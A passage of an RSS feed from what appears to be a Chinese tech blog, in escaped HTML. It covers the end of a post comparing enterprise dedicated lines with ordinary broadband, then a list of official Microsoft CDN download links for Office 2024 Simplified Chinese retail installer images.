leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;静态公网IP地址，也就意味着，wan口的Ip地址是固定不变的。静态IP地址，基本上都是企业开通专线才会提供静态公网IP地址，因为企业专线价格贵，一般家庭也用不到专线。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;我们公司的移动300M专线就是2400元/月。&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class=&quot; list-paddingleft-2&quot; style=&quot;-webkit-tap-highlight-color: transparent; padding: 0px 0px 0px 1.2em; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;li&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;独享带宽：专线是独享带宽，不受其他用户的影响。即使在同一区域内有大量用户同时使用网络，你的100兆带宽仍然是完全属于你的，不会被其他用户占用。&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;上下行对等：专线的上下行带宽是对等的，100兆的上行带宽可以满足企业大部分的上传需求，不会出现上行带宽不足的情况。&lt;/span&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; text-indent: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;那最后，还有一个问题，到底1000兆速普通带宽度快？还是100兆专线速度快？&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;看完下面的对照表：兄弟们，你们说到底哪个快，哪个带宽好？&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;&lt;img data-width=&quot;555&quot; data-height=&quot;207&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/04/202504081744078661548303.jpg&quot; alt=&quot;1744078653066.jpg&quot;/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 8px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; line-height: 2em; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span leaf=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;&quot;&gt;&lt;span textstyle=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-size: 14px;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Tue, 08 Apr 2025 10:09:45 +0800</pubDate></item><item><title>Office2024简体中文离线安装包下载地址合集，微软官方版本</title><link>https://www.qxhut.cn/?id=47</link><description>&lt;p&gt;&lt;span style=&quot;color: #191B1F; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;截至目前，Office2024所有版本已经正式发布。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;h2 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.2em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(2.33333em) 0px calc(1.16667em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;1.正式版官宣&lt;/h2&gt;&lt;p data-pid=&quot;okXTRGjP&quot; style=&quot;margin-top: 1.4em; margin-bottom: 1.4em; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;官宣地址：&lt;/p&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://techcommunity.microsoft.com/t5/microsoft-365-blog/office-ltsc-2024-is-now-available/ba-p/4244953&lt;/pre&gt;&lt;/div&gt;&lt;p data-pid=&quot;UZMDiDue&quot; style=&quot;margin-top: 1.4em; margin-bottom: 1.4em; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;微软在其官网上进行了正式官宣，Office 2024的零售版（Retail）和批量授权版（Volume）的全语言版本已经全部上线。&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #191B1F; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: #FFFFFF;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;h2 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.2em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(2.33333em) 0px calc(1.16667em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;2.中文简体离线版（零售版）&lt;/h2&gt;&lt;p data-pid=&quot;NjLFS2lB&quot; style=&quot;margin-top: 1.4em; margin-bottom: 1.4em; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;以下为中文离线版镜像安装包，复制链接粘贴到浏览器地址栏即可下载。&lt;/p&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;Access2024：&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/Access2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;Excel2024：&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/Excel2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;Office家庭和学生版2024&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/Home2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;OfficeHomeBusiness&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/HomeBusiness2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;Outlook2024&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/Outlook2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;PowerPoint2024&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/PowerPoint2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;ProjectPro2024&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/ProjectPro2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;ProjectStd2024&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/ProjectStd2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;Office专业增强版2024&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-size: medium; text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;&lt;pre style=&quot;margin-top: 0px; margin-bottom: 0px; overflow-wrap: initial; background-color: rgb(248, 248, 250); border-radius: 4px; font-size: 0.9em; overflow: auto; padding: calc(0.888889em); word-break: initial;&quot;&gt;https://officecdn.microsoft.com/db/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/media/zh-cn/ProPlus2024Retail.img&lt;/pre&gt;&lt;/div&gt;&lt;h3 style=&quot;font-variant-numeric: inherit; font-variant-east-asian: inherit; font-variant-alternates: inherit; font-variant-position: inherit; font-variant-emoji: inherit; font-stretch: inherit; font-size: 1.1em; line-height: 1.5; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, sans-serif; font-optical-sizing: inherit; font-size-adjust: inherit; font-kerning: inherit; font-feature-settings: inherit; font-variation-settings: inherit; margin: calc(1.90909em) 0px calc(1.27273em); clear: left; color: rgb(25, 27, 31); text-wrap-mode: wrap; background-color: rgb(255, 255, 255);&quot;&gt;VisioPro2024&lt;/h3&gt;&lt;div class=&quot;highlight&quot; style=&quot;margin: 1em 0px; color: rgb(25, 27, 31); font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, &amp;quot;Source Han Sans SC&amp;quot;, &amp;quot;Noto Sans CJK SC&amp;quot;, &amp;quot;WenQuanYi Micro Hei&amp;quot;, 